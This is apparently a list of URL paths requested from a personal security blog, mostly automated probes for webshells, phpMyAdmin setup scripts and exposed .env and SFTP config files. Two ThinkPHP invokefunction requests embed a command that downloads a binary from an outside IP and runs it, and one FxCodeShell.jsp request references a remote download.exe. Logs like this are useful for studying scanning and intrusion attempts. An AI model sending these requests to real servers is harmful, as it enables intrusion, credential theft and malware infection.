
/
/000000000000.cfg
003.003"
/1111.php
/1213.php
/123.php
/12.php
1337newbs.com:443
/1hou.php
/1ndex.php
/1.php
/1q.php
/2016/03/16/HelloWorld.md.html
/2016/03/22/16-MsfVenom-Walkthrough.md.html
/2016/03/23/16-badlock.md.html
/2016/04/18/sqlmap-tamper.md.html
/2016/08/11/mimikatz.md.html
/2016/08/13/OclHashcat.md.html
/2/favicon.ico
/2.php
/2phpmyadmin/index.php?lang=en
301
/3/favicon.ico
/3.php
/51314.php
/51.php
/5201314.php
/56.php
/666.php
/6D423F2D.php
/777.php
/7788.php
/7.php
/8899.php
/92.php
/9510.php
/9678.php
//a2billing/customer/templates/default/footer.tpl
/a2billing/customer/templates/default/footer.tpl
/aaaaaa1.php
/aaaa.php
/aaa.php
/aa.php
/about.html
/about.php
/acadmin.php
/admin/assets/js/views/login.js
//admin/config.php
/admin/config.php
/admin/db/index.php?lang=en
/admin/images/cal_date_over.gif
/admin/imgs/version.js
/admin/index.php
/admin/index.php?lang=en
/administrator
//administrator
/administrator/admin/index.php?lang=en
/administrator/db/index.php?lang=en
/administrator/index.php
/Administrator.php
/administrator/phpmyadmin/index.php?lang=en
/administrator/phpMyAdmin/index.php?lang=en
/administrator/pma/index.php?lang=en
/administrator/PMA/index.php?lang=en
/administrator/web/index.php?lang=en
/admin/mysql2/index.php
/admin/mysql/index.php
/admin/phpmyadmin2/index.php
/admin/phpmyadmin/index.php
/admin/phpMyAdmin/index.php
/admin/phpmyadmin/index.php?lang=en
/admin/phpMyAdmin/index.php?lang=en
/admin/phpmyadmin/scripts/setup.php
/admin/pma/index.php
/admin/PMA/index.php
/admin/pMA/index.php?lang=en
/admin/pma/scripts/setup.php
/admin/scripts/setup.php
/admin/sqladmin/index.php?lang=en
/admin/sysadmin/index.php?lang=en
/admin/web/index.php?lang=en
/admn.php
/ak47.php
/ak48.php
/ak.php
/angge.php
/aotu7.php
/aotu.php
/a.php
/api/deployment-config.json
/api/.env
/api/.ftpconfig
/api/ftpsync.settings
/api.php
/api/.remote-sync.json
/api/sftp-config.json
/api/.vscode/ftp-sync.json
/api/.vscode/settings.json
/api/.vscode/sftp.json
/App6d423f2d.php
/Apple6D423F2D.php
/app.php
/appserv.php
/archive.html
/aw.php
/bak.php
/bbs/data/scripts/setup.php
/beta/deployment-config.json
/beta/.env
/beta/.ftpconfig
/beta/ftpsync.settings
/beta/.remote-sync.json
/beta/sftp-config.json
/beta/.vscode/ftp-sync.json
/beta/.vscode/settings.json
/beta/.vscode/sftp.json
/blog/wp-login.php
/Blog/wp-login.php
/boots.php
/cacti/plugins/weathermap/editor.php
/cadre.php
/cainiao.php
/caonma.php
/cc.php
/ccvv
/cere.php
/ceshi.php
/cgi-bin/firmware.cgi?formNumber=200
/cgi-bin/php
/cgi-bin/php5
//cgi-bin/test-cgi
/CHANGELOG.txt
/chaoda.php
/claroline/phpMyAdmin/index.php
/clxngjutcubuexw.html
/cmdd.php
/cmd.php
/cms/
/cms/administrator
/cmv.php
/cmx.php
/cnm.php
/cn.php
/conf1g.php
/confg.php
/conflg.php
/conf.php
/coon.php
/core.php
/cpadmindb/scripts/setup.php
/cpadmin/scripts/setup.php
/cpanelmysql/scripts/setup.php
/cpanelphpmyadmin/scripts/setup.php
/cpanelsql/scripts/setup.php
/cpphpmyadmin/scripts/setup.php
/css/bootstrap.min.css
/css/font-awesome/css/font-awesome.min.css
/css/font-awesome/fonts/fontawesome-webfont.eot
/css/font-awesome/fonts/fontawesome-webfont.eot?v=4.4.0
/css/font-awesome/fonts/fontawesome-webfont.svg?v=4.4.0
/css/font-awesome/fonts/fontawesome-webfont.ttf?v=4.4.0
/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0
/css/font-awesome/fonts/fontawesome-webfont.woff?v=4.4.0
/css/pics/triangles.png
/css/syntax.css
/css/theme.css
/cxfm666.php
/database/index.php?lang=en
/data.php
/dbadmin/index.php
/dbadmin/index.php?lang=en
//dbadmin/scripts/setup.php
/dbadmin/scripts/setup.php
/db_cts.php
/db_dataml.php
/db/db-admin/index.php?lang=en
/db/dbadmin/index.php?lang=en
/db/dbweb/index.php?lang=en
/db_desql.php
/db/index.php
/db/index.php?lang=en
/db__.init.php
/db.init.php
/db/myadmin/index.php?lang=en
/db.php
/db/phpmyadmin3/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/db/phpMyAdmin3/index.php?lang=en
/db/phpmyadmin/index.php?lang=en
/db/phpMyAdmin/index.php?lang=en
/db_pma.php
//db/scripts/setup.php
/db/scripts/setup.php
/db_session.init.php
/db/webadmin/index.php?lang=en
/db/webdb/index.php?lang=en
/db/websql/index.php?lang=en
/default.php
/defect.php
/deployment-config.json
/desktop.ini.php
/dev/deployment-config.json
/dev/.env
/dev/.ftpconfig
/dev/ftpsync.settings
/devicecfg/
/dev/.remote-sync.json
/dev/sftp-config.json
/dev/.vscode/ftp-sync.json
/dev/.vscode/settings.json
/dev/.vscode/sftp.json
/dexgp.php
/diy.php
/downloader/
/drupal/
/E14256B66D1984A1C7866AF4915A095F.php
/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/.env
/errors.php
/erwa.php
/evox/about
/fack.php
/favicon.ico
/?fbclid=IwAR01vgo_H1WFxm7H3tQz1NzvxVg9lZA9xFimFchhG5vX6rW5M2RpJr_Cp14
/fb.php
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/feed.xml
/feixiang.php
/fonts/glyphicons-halflings-regular.eot
/fonts/glyphicons-halflings-regular.svg
/fonts/glyphicons-halflings-regular.ttf
/fonts/glyphicons-halflings-regular.woff
/.ftpconfig
/ftpsync.settings
/fusheng.php
/FxCodeShell.jsp/
/FxCodeShell.jsp%20
/FxCodeShell.jsp::$DATA
/FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe
/general.php
/.git/HEAD
/godkey.php
/GponForm/diag_Form?images/
/gs/
/guai.php
/h1.php
/hack.php
/hacly.php
/handle_load_config.php
/hello.php
/hell.php
/help-e.php
/help.php
/hh.php
/hm.php
/HNAP1
/HNAP1/
/home/favicon.ico
/horde3/imp/test.php
/horde/imp/test.php
/htdocs.php
/htfr.php
http://112.124.42.80:63435/
http://45.63.66.109/
http://45.63.66.109:80/1phpmyadmin/
http://45.63.66.109:80/3phpmyadmin/
http://45.63.66.109:80/4phpmyadmin/
http://45.63.66.109:80/admin/
http://45.63.66.109:80/admin/db/
http://45.63.66.109:80/administrator/admin/
http://45.63.66.109:80/administrator/db/
http://45.63.66.109:80/administrator/phpmyadmin/
http://45.63.66.109:80/administrator/phpMyAdmin/
http://45.63.66.109:80/administrator/pma/
http://45.63.66.109:80/administrator/PMA/
http://45.63.66.109:80/administrator/web/
http://45.63.66.109:80/admin/phpmyadmin/
http://45.63.66.109:80/admin/phpMyAdmin/
http://45.63.66.109:80/admin/pMA/
http://45.63.66.109:80/admin/sqladmin/
http://45.63.66.109:80/admin/sysadmin/
http://45.63.66.109:80/admin/web/
http://45.63.66.109:80/database/
http://45.63.66.109:80/db/
http://45.63.66.109:80/dbadmin/
http://45.63.66.109:80/db/db-admin/
http://45.63.66.109:80/db/dbadmin/
http://45.63.66.109:80/db/dbweb/
http://45.63.66.109:80/db/myadmin/
http://45.63.66.109:80/db/phpmyadmin/
http://45.63.66.109:80/db/phpMyAdmin/
http://45.63.66.109:80/db/phpmyadmin3/
http://45.63.66.109:80/db/phpMyAdmin-3/
http://45.63.66.109:80/db/phpMyAdmin3/
http://45.63.66.109:80/db/webadmin/
http://45.63.66.109:80/db/webdb/
http://45.63.66.109:80/db/websql/
http://45.63.66.109:80/host/
http://45.63.66.109:80/localhost/
http://45.63.66.109:80/myadmin/
http://45.63.66.109:80/MyAdmin/
http://45.63.66.109:80/myadminphp/
http://45.63.66.109:80/mysql/
http://45.63.66.109:80/mysql-admin/
http://45.63.66.109:80/mysql/admin/
http://45.63.66.109:80/mysqladmin/
http://45.63.66.109:80/mysql/db/
http://45.63.66.109:80/mysql/dbadmin/
http://45.63.66.109:80/mysqlmanager/
http://45.63.66.109:80/mysql/mysqlmanager/
http://45.63.66.109:80/mysql/pma/
http://45.63.66.109:80/mysql/pMA/
http://45.63.66.109:80/mysql/sqlmanager/
http://45.63.66.109:80/mysql/web/
http://45.63.66.109:80/phpmanager/
http://45.63.66.109:80/phpmy/
http://45.63.66.109:80/php-my-admin/
http://45.63.66.109:80/php-myadmin/
http://45.63.66.109:80/phpmy-admin/
http://45.63.66.109:80/phpmyadmin/
http://45.63.66.109:80/phpmyAdmin/
http://45.63.66.109:80/phpMyadmin/
http://45.63.66.109:80/phpMyAdmin/
http://45.63.66.109:80/phpmyadmin1/
http://45.63.66.109:80/phpmyadmin2/
http://45.63.66.109:80/phpMyAdmin-2/
http://45.63.66.109:80/phpMyAdmin2/
http://45.63.66.109:80/phpMyAdmin-2.11.5.1-all-languages/
http://45.63.66.109:80/phpMyAdmin-2.11.6-all-languages/
http://45.63.66.109:80/phpMyAdmin-2.11.7.1-all-languages/
http://45.63.66.109:80/phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
http://45.63.66.109:80/phpMyAdmin-2.11.8.1-all-languages/
http://45.63.66.109:80/phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
http://45.63.66.109:80/phpMyAdmin-2.2.3/
http://45.63.66.109:80/phpMyAdmin-2.2.6/
http://45.63.66.109:80/phpMyAdmin-2.5.1/
http://45.63.66.109:80/phpMyAdmin-2.5.4/
http://45.63.66.109:80/phpMyAdmin-2.5.5/
http://45.63.66.109:80/phpMyAdmin-2.5.5-pl1/
http://45.63.66.109:80/phpMyAdmin-2.5.5-rc1/
http://45.63.66.109:80/phpMyAdmin-2.5.5-rc2/
http://45.63.66.109:80/phpMyAdmin-2.5.6/
http://45.63.66.109:80/phpMyAdmin-2.5.6-rc1/
http://45.63.66.109:80/phpMyAdmin-2.5.6-rc2/
http://45.63.66.109:80/phpMyAdmin-2.5.7/
http://45.63.66.109:80/phpMyAdmin-2.5.7-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.0/
http://45.63.66.109:80/phpMyAdmin-2.6.0-alpha/
http://45.63.66.109:80/phpMyAdmin-2.6.0-alpha2/
http://45.63.66.109:80/phpMyAdmin-2.6.0-beta1/
http://45.63.66.109:80/phpMyAdmin-2.6.0-beta2/
http://45.63.66.109:80/phpMyAdmin-2.6.0-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.0-pl2/
http://45.63.66.109:80/phpMyAdmin-2.6.0-pl3/
http://45.63.66.109:80/phpMyAdmin-2.6.0-rc1/
http://45.63.66.109:80/phpMyAdmin-2.6.0-rc2/
http://45.63.66.109:80/phpMyAdmin-2.6.0-rc3/
http://45.63.66.109:80/phpMyAdmin-2.6.1/
http://45.63.66.109:80/phpMyAdmin-2.6.1-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.1-pl2/
http://45.63.66.109:80/phpMyAdmin-2.6.1-pl3/
http://45.63.66.109:80/phpMyAdmin-2.6.1-rc1/
http://45.63.66.109:80/phpMyAdmin-2.6.1-rc2/
http://45.63.66.109:80/phpMyAdmin-2.6.2/
http://45.63.66.109:80/phpMyAdmin-2.6.2-beta1/
http://45.63.66.109:80/phpMyAdmin-2.6.2-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.2-rc1/
http://45.63.66.109:80/phpMyAdmin-2.6.3/
http://45.63.66.109:80/phpMyAdmin-2.6.3-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.3-rc1/
http://45.63.66.109:80/phpMyAdmin-2.6.4/
http://45.63.66.109:80/phpMyAdmin-2.6.4-pl1/
http://45.63.66.109:80/phpMyAdmin-2.6.4-pl2/
http://45.63.66.109:80/phpMyAdmin-2.6.4-pl3/
http://45.63.66.109:80/phpMyAdmin-2.6.4-pl4/
http://45.63.66.109:80/phpMyAdmin-2.6.4-rc1/
http://45.63.66.109:80/phpMyAdmin-2.7.0/
http://45.63.66.109:80/phpMyAdmin-2.7.0-beta1/
http://45.63.66.109:80/phpMyAdmin-2.7.0-pl1/
http://45.63.66.109:80/phpMyAdmin-2.7.0-pl2/
http://45.63.66.109:80/phpMyAdmin-2.7.0-rc1/
http://45.63.66.109:80/phpMyAdmin-2.8.0/
http://45.63.66.109:80/phpMyAdmin-2.8.0.1/
http://45.63.66.109:80/phpMyAdmin-2.8.0.2/
http://45.63.66.109:80/phpMyAdmin-2.8.0.3/
http://45.63.66.109:80/phpMyAdmin-2.8.0.4/
http://45.63.66.109:80/phpMyAdmin-2.8.0-beta1/
http://45.63.66.109:80/phpMyAdmin-2.8.0-rc1/
http://45.63.66.109:80/phpMyAdmin-2.8.0-rc2/
http://45.63.66.109:80/phpMyAdmin-2.8.1/
http://45.63.66.109:80/phpMyAdmin-2.8.1-rc1/
http://45.63.66.109:80/phpMyAdmin-2.8.2/
http://45.63.66.109:80/phpmyadmin3/
http://45.63.66.109:80/phpMyAdmin-3/
http://45.63.66.109:80/phpMyAdmin3/
http://45.63.66.109:80/phpmyadmin4/
http://45.63.66.109:80/phpMyAdmin-4/
http://45.63.66.109:80/phpMyAdmin4/
http://45.63.66.109:80/phpMyAdmin-4.6.4/
http://45.63.66.109:80/phpmyadmin/admin/
http://45.63.66.109:80/phppma/
http://45.63.66.109:80/p/m/a/
http://45.63.66.109:80/pma/
http://45.63.66.109:80/PMA/
http://45.63.66.109:80/pma2005/
http://45.63.66.109:80/PMA2005/
http://45.63.66.109:80/pma2009/
http://45.63.66.109:80/PMA2009/
http://45.63.66.109:80/pma2011/
http://45.63.66.109:80/PMA2011/
http://45.63.66.109:80/pma2012/
http://45.63.66.109:80/PMA2012/
http://45.63.66.109:80/pma2013/
http://45.63.66.109:80/PMA2013/
http://45.63.66.109:80/pma2014/
http://45.63.66.109:80/PMA2014/
http://45.63.66.109:80/pma2015/
http://45.63.66.109:80/PMA2015/
http://45.63.66.109:80/pma2016/
http://45.63.66.109:80/PMA2016/
http://45.63.66.109:80/program/
http://45.63.66.109:80/shopdb/
http://45.63.66.109:80/sqlmanager/
http://45.63.66.109:80/sql/myadmin/
http://45.63.66.109:80/sql/phpmanager/
http://45.63.66.109:80/sql/php-myadmin/
http://45.63.66.109:80/sql/phpmy-admin/
http://45.63.66.109:80/sql/phpMyAdmin/
http://45.63.66.109:80/sql/phpmyadmin2/
http://45.63.66.109:80/sql/phpMyAdmin2/
http://45.63.66.109:80/sql/phpmyadmin3/
http://45.63.66.109:80/sql/phpMyAdmin3/
http://45.63.66.109:80/sql/phpmyadmin4/
http://45.63.66.109:80/sql/phpMyAdmin4/
http://45.63.66.109:80/sql/sql/
http://45.63.66.109:80/sql/sql-admin/
http://45.63.66.109:80/sql/sqladmin/
http://45.63.66.109:80/sql/sqlweb/
http://45.63.66.109:80/sql/webadmin/
http://45.63.66.109:80/sql/webdb/
http://45.63.66.109:80/sql/websql/
http://5.188.210.12/echo.php
http://api.ipify.org/
http://proxyjudge.us/
http://www.123cha.com
http://www.baidu.com/
/HX.php
/?id=1
/images/
/images/ssh_users.txt
/imp/test.php
/index1.php
/index.action
/indexa.php
/index.php
/index.php/admin/
/index.php?lang=en
/index.php?option=com_user&task=register
/info1.php
/infoo.php
/info.php
/infos.php
/ip.php
/java.php
/jenkins/script
/jmx-console
/joomla/administrator
/Joomla/administrator
/j.php
/js/bootstrap.min.js
/js/header.js
/js/jquery.min.js
/js/toc.js
/Jwlsjd_baaqifg.php
/JZHp
/kelqwfpr.html
/knal.php
/l6.php
/l7.php
/l8.php
/lala-dpr.php
/lala.php
/lanke.php
/lanyecn.php
/ldw.php
/liangchen.php
/libraries/sfn.php
/license.php
/lindex.php
/linux1.php
/linux.php
/linuxse.php
/ljb.php
/login
/login.action
/logon.php
/log.php
/lol.php
/lost.php
/lucky.php
/lx.php
/mailer/admin/index.php
/manager/html
/mazi.php
/MCLi.php
/m/deployment-config.json
/meng.php
/m/.env
/m/.ftpconfig
/m/ftpsync.settings
/miao.php
/min.php
/mm.php
/moo
/m.php
/m.php?pbid=open
/m/.remote-sync.json
/msd
/msd1.24.4
/msd1.24stable
/m/sftp-config.json
/muhstik2.php
/muhstik-dpr.php
/muhstik.php
/muhstiks.php
/muieblackcat
/m/.vscode/ftp-sync.json
/m/.vscode/settings.json
/m/.vscode/sftp.json
/mx.php
/myadmin
/myadmin2/index.php
/myadmin/index.php
/MyAdmin/index.php
/myadmin/index.php?lang=en
/MyAdmin/index.php?lang=en
//myadmin/scripts/setup.php
/myadmin/scripts/setup.php
//MyAdmin/scripts/setup.php
/MyAdmin/scripts/setup.php
/mysql
/mysqladminconfig/scripts/setup.php
/mysql_admin/index.php
/mysql-admin/index.php
/mysql/admin/index.php
/mysqladmin/index.php
/mysql-admin/index.php?lang=en
/mysql/admin/index.php?lang=en
/mysqladmin/index.php?lang=en
//mysqladmin/scripts/setup.php
/mysql-admin/scripts/setup.php
/mysqladmin/scripts/setup.php
/mysql/dbadmin/index.php
/mysql/dbadmin/index.php?lang=en
/mysql/db/index.php?lang=en
/mysqldumper
/mySqlDumper
/MySQLDumper
/mysql/index.php
/mysql/index.php?lang=en
/mysqlmanager/index.php?lang=en
/mysqlmanager/scripts/setup.php
/mysql/mysqlmanager/index.php
/mysql/mysqlmanager/index.php?lang=en
/mysql.php
/mysql/pma/index.php?lang=en
/mysql/pMA/index.php?lang=en
//mysql/scripts/setup.php
/mysql/scripts/setup.php
/mysql/sqlmanager/index.php
/mysql/sqlmanager/index.php?lang=en
/mysql/web/index.php?lang=en
/mz.php
/neko.php
/nmaplowercheck1549983000
/no.php
/nuoxi.php
/oihfoe09fposf.php
/okokok.php
/old/wp-login.php
/onvif-http/snapshot?auth=YWRtaW46MTEK
/ou2.php
/payload.php
/paylog.php
/pe.php
/.php
/phpadmin/index.php
/phpAdmin/index.php
/phpadmin/scripts/setup.php
/phpinfi.php
/phpini.php
/phpma/index.php
/phpmanager/scripts/setup.php
/phpMyAbmin/index.php
/phpmyadm1n/index.php
/phpMyAdm1n/index.php
/phpMyadmi/index.php
/phpmyadmin
/phpmyadmin/
/phpMyAdmin
/phpmyadmin0/index.php
/phpMyAdmin123/index.php
/phpmyadmin1/index.php
/phpMyAdmin1/index.php
/phpmyadmin1/scripts/setup.php
/phpmyadmin2011/index.php?lang=en
/phpmyadmin2012/index.php?lang=en
/phpmyadmin2013/index.php?lang=en
/phpmyadmin2014/index.php?lang=en
/phpmyadmin2015/index.php?lang=en
/phpmyadmin2016/index.php?lang=en
/phpmyadmin2017/index.php?lang=en
/phpmyadmin2018/index.php?lang=en
/phpmyadmin2019/index.php?lang=en
//phpMyAdmin-2.10.0.0/scripts/setup.php
//phpMyAdmin-2.11.11.3/scripts/setup.php
//phpMyAdmin-2.11.11/scripts/setup.php
/phpMyAdmin-2.2.3/scripts/setup.php
/phpMyAdmin-2.2.6/scripts/setup.php
/phpMyAdmin-2.5.1/scripts/setup.php
/phpMyAdmin-2.5.4/scripts/setup.php
/phpMyAdmin-2.5.5-pl1/scripts/setup.php
/phpMyAdmin-2.5.5-rc1/scripts/setup.php
/phpMyAdmin-2.5.5-rc2/scripts/setup.php
/phpMyAdmin-2.5.5/scripts/setup.php
/phpMyAdmin-2.5.6-rc1/scripts/setup.php
/phpMyAdmin-2.5.6-rc2/scripts/setup.php
/phpMyAdmin-2.5.6/scripts/setup.php
/phpMyAdmin-2.5.7-pl1/scripts/setup.php
/phpMyAdmin-2.5.7/scripts/setup.php
/phpMyAdmin-2.6.0-alpha/scripts/setup.php
/phpMyAdmin-2.6.0-beta1/scripts/setup.php
/phpMyAdmin-2.6.0-beta2/scripts/setup.php
/phpMyAdmin-2.6.0-pl1/scripts/setup.php
/phpMyAdmin-2.6.0-pl2/scripts/setup.php
/phpMyAdmin-2.6.0-pl3/scripts/setup.php
/phpMyAdmin-2.6.0-rc1/scripts/setup.php
/phpMyAdmin-2.6.0-rc2/scripts/setup.php
/phpMyAdmin-2.6.0/scripts/setup.php
/phpMyAdmin-2.6.1-pl1/scripts/setup.php
/phpMyAdmin-2.6.1-pl2/scripts/setup.php
/phpMyAdmin-2.6.1-pl3/scripts/setup.php
/phpMyAdmin-2.6.1-rc1/scripts/setup.php
/phpMyAdmin-2.6.1-rc2/scripts/setup.php
/phpMyAdmin-2.6.1/scripts/setup.php
/phpMyAdmin-2.6.2-beta1/scripts/setup.php
/phpMyAdmin-2.6.2-pl1/scripts/setup.php
/phpMyAdmin-2.6.2-rc1/scripts/setup.php
/phpMyAdmin-2.6.2/scripts/setup.php
/phpMyAdmin-2.6.3-pl1/scripts/setup.php
/phpMyAdmin-2.6.3-rc1/scripts/setup.php
/phpMyAdmin-2.6.3/scripts/setup.php
/phpMyAdmin-2.6.4-pl1/scripts/setup.php
/phpMyAdmin-2.6.4-pl2/scripts/setup.php
/phpMyAdmin-2.6.4-pl3/scripts/setup.php
/phpMyAdmin-2.6.4-pl4/scripts/setup.php
/phpMyAdmin-2.6.4-rc1/scripts/setup.php
/phpMyAdmin-2.6.4/scripts/setup.php
/phpMyAdmin-2.7.0-beta1/scripts/setup.php
/phpMyAdmin-2.7.0-pl1/scripts/setup.php
/phpMyAdmin-2.7.0-pl2/scripts/setup.php
/phpMyAdmin-2.7.0-rc1/scripts/setup.php
/phpMyAdmin-2.7.0/scripts/setup.php
/phpMyAdmin-2.8.0.1/scripts/setup.php
/phpMyAdmin-2.8.0.2/scripts/setup.php
/phpMyAdmin-2.8.0.3/scripts/setup.php
/phpMyAdmin-2.8.0.4/scripts/setup.php
/phpMyAdmin-2.8.0-beta1/scripts/setup.php
/phpMyAdmin-2.8.0-rc1/scripts/setup.php
/phpMyAdmin-2.8.0-rc2/scripts/setup.php
/phpMyAdmin-2.8.0/scripts/setup.php
/phpMyAdmin-2.8.1-rc1/scripts/setup.php
/phpMyAdmin-2.8.1/scripts/setup.php
/phpMyAdmin-2.8.2/scripts/setup.php
/phpmyadmin2/index.php
/phpmyadmin2/index.php?lang=en
/phpMyAdmin2/index.php?lang=en
//phpmyadmin2/scripts/setup.php
/phpmyadmin2/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
//phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
/phpmyadmin3/index.php?lang=en
/phpMyAdmin-3/index.php?lang=en
/phpMyAdmin3/index.php?lang=en
//phpmyadmin3/scripts/setup.php
/phpMyAdmin-4.2.1-all-languages
/phpMyAdmin-4.2.1-english
/phpMyAdmin-4.4.0/index.php
/phpmyadmin4/index.php?lang=en
/phpMyAdmin4/index.php?lang=en
//phpmyadmin4/scripts/setup.php
//phpmyadmin5/scripts/setup.php
//phpmyadmin6/scripts/setup.php
//phpmyadmin7/scripts/setup.php
/phpMyAdmina/index.php
/phpMyadmin_bak/index.php
/phpmyadmin/index.php
/phpMyAdmin__/index.php
/phpMyAdmin/index.php
/phpMyAdmin+++---/index.php
/php-my-admin/index.php?lang=en
/php-myadmin/index.php?lang=en
/phpmy-admin/index.php?lang=en
/phpmyadmin/index.php?lang=en
/phpmyAdmin/index.php?lang=en
/phpMyadmin/index.php?lang=en
/phpMyAdmin/index.php?lang=en
/phpmyadmin-old/index.php
/phpMyAdmin.old/index.php
/phpMyAdminold/index.php
/phpmyadmin/phpmyadmin/index.php
/phpMyAdmin/phpMyAdmin/index.php
/phpmyadmin/scripts/db___.init.php
/phpMyAdmin/scripts/db___.init.php
//phpmyadmin/scripts/setup.php
/php-my-admin/scripts/setup.php
/php-myadmin/scripts/setup.php
/phpmy-admin/scripts/setup.php
/phpmyadmin/scripts/setup.php
//phpMyAdmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/PHPMYADMIN/scripts/setup.php
/phpMyAdmins/index.php
/phpMyAdmion/index.php
/phpMydmin/index.php
/phpmy/index.php
/phpmy/index.php?lang=en
/php.php
/phppma/index.php
/phppma/index.php?lang=en
/phpstudy.php
/phpStudy.php
/plugins/weathermap/editor.php
/pma2005/scripts/setup.php
/PMA2005/scripts/setup.php
/pma2011/index.php?lang=en
/PMA2011/index.php?lang=en
/pma2012/index.php?lang=en
/PMA2012/index.php?lang=en
/pma2013/index.php?lang=en
/PMA2013/index.php?lang=en
/pma2014/index.php?lang=en
/PMA2014/index.php?lang=en
/pma2015/index.php?lang=en
/PMA2015/index.php?lang=en
/pma2016/index.php?lang=en
/PMA2016/index.php?lang=en
/pma2017/index.php?lang=en
/PMA2017/index.php?lang=en
/pma2018/index.php?lang=en
/PMA2018/index.php?lang=en
/pma2019/index.php?lang=en
/PMA2/index.php
/pma/index.php
/PMA/index.php
/pma/index.php?lang=en
/PMA/index.php?lang=en
/pmamy2/index.php
/pmamy/index.php
/pma-old/index.php
/pma.php
//pma/scripts/setup.php
/p/m/a/scripts/setup.php
/pma/scripts/setup.php
/PMA/scripts/setup.php
/pmd/index.php
/pmd_online.php
/post.php
/p.php
/ppx.php
/program/index.php
/program/index.php?lang=en
/public/deployment-config.json
/public/.env
/public/.ftpconfig
/public/ftpsync.settings
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://157.230.214.179/bin/sora.x86;cat%20bin/sora.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://157.230.214.179/bin/sora.x86;cat%20bin/sora.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp
/public/.remote-sync.json
/public/sftp-config.json
/public/.vscode/ftp-sync.json
/public/.vscode/settings.json
/public/.vscode/sftp.json
/pwd/index.php
/python.php
/qa.php
/qaq.php
/qaz.php
/q.php
/qq5262.php
/qq.php
/_query.php
/qwe.php
/qw.php
/qwq.php
/qwqw.php
//recordings/
/recordings/
/.remote-sync.json
/repeat.php
/robots.txt
/rss/catalog/notifystock/
/ruyi.php
/rxr.php
/s1.php
/script
/scripts.js
//scripts/setup.php
/scripts/setup.php
/sdk
/sean.php
/server-status
/sftp-config.json
/shaAdmin/index.php
/sha.php
/sheep.php
/shell.php
/she.php
/shopdb/index.php
/shopdb/index.php?lang=en
/s/index.php
/site/deployment-config.json
/site/.env
/site/.ftpconfig
/site/ftpsync.settings
/sitemap.xml
/site/.remote-sync.json
/site/sftp-config.json
/site/.vscode/ftp-sync.json
/site/.vscode/settings.json
/site/.vscode/sftp.json
/s.php
/sql
/sqladmin/scripts/setup.php
/sqlite/main.php
/SQlite/main.php
/SQLiteManager-1.2.4/main.php
/sqlitemanager/main.php
/SQLiteManager/main.php
/SQLite/SQLiteManager-1.2.4/main.php
/sqlmanager/index.php?lang=en
/sqlmanager/scripts/setup.php
/sql/myadmin/index.php?lang=en
/sql/phpmanager/index.php?lang=en
/sql/phpmyadmin2/index.php?lang=en
/sql/phpMyAdmin2/index.php?lang=en
/sql/php-myadmin/index.php?lang=en
/sql/phpmy-admin/index.php?lang=en
/sql/phpMyAdmin/index.php?lang=en
/SQL/scripts/setup.php
/sql/sql-admin/index.php?lang=en
/sql/sqladmin/index.php?lang=en
/sql/sql/index.php?lang=en
/sql/sqlweb/index.php?lang=en
/sql/webadmin/index.php?lang=en
/sql/webdb/index.php?lang=en
/sql/websql/index.php?lang=en
/ssaa.php
/SSLMySQLAdmin/scripts/setup.php
/ss.php
/Ss.php
/sss.php
/stag/deployment-config.json
/stage/deployment-config.json
/stage/.env
/stage/.ftpconfig
/stage/ftpsync.settings
/stag/.env
/stage/.remote-sync.json
/stage/sftp-config.json
/stage/.vscode/ftp-sync.json
/stage/.vscode/settings.json
/stage/.vscode/sftp.json
/stag/.ftpconfig
/stag/ftpsync.settings
/stag/.remote-sync.json
/stag/sftp-config.json
/stag/.vscode/ftp-sync.json
/stag/.vscode/settings.json
/stag/.vscode/sftp.json
/status?full=true
/super.php
/system.php
/tag/badlock
/tag/badlock/
/tag/encoding
/tag/encoding/
/tag/gpu
/tag/gpu/
/tag/hashcat
/tag/hashcat/
/tag/metasploit
/tag/metasploit/
/tag/mimikatz
/tag/mimikatz/
/tag/msf
/tag/msf/
/tag/msfencode
/tag/msfencode/
/tag/msfpayload
/tag/msfpayload/
/tag/msfvenom
/tag/msfvenom/
/tag/oclhashcat
/tag/oclhashcat/
/tag/password%20cracking
/tag/password%20cracking/
/tag/patch%20your%20kids%20patch%20your%20wife
/tag/patch%20your%20kids%20patch%20your%20wife/
/tag/payload
/tag/payload/
/tag/samba
/tag/samba/
/tags.html
/tag/sql%20injection
/tag/sql%20injection/
/tag/sqli
/tag/sqli/
/tag/sqlmap
/tag/sqlmap/
/tag/tamper
/tag/tamper/
/tag/vulnerability
/tag/vulnerability/
/temp.php
/temp/wp-admin/
/test123.php
/test/deployment-config.json
/test/.env
/test/.ftpconfig
/test/ftpsync.settings
/test.php
/test/.remote-sync.json
/test/sftp-config.json
/test/.vscode/ftp-sync.json
/test/.vscode/settings.json
/test/.vscode/sftp.json
/text.php
/tiandi.php
/tomcat.php
/tools/phpMyAdmin/index.php
/toor.php
/TP/public/index.php
/typo3/phpmyadmin
/typo3/phpmyadmin/index.php
/typo3/phpmyadmin/scripts/setup.php
/undx.php
/Updata.php
/upgrade_handle.php?cmd=getupgradinginfo
/u.php
/uploader.php
/up.php
/user/register
/uu.php
/uuu.php
/v1/agent/self
/ver.php
/vh17/history
/view/img/favicon.ico
/v/index.php
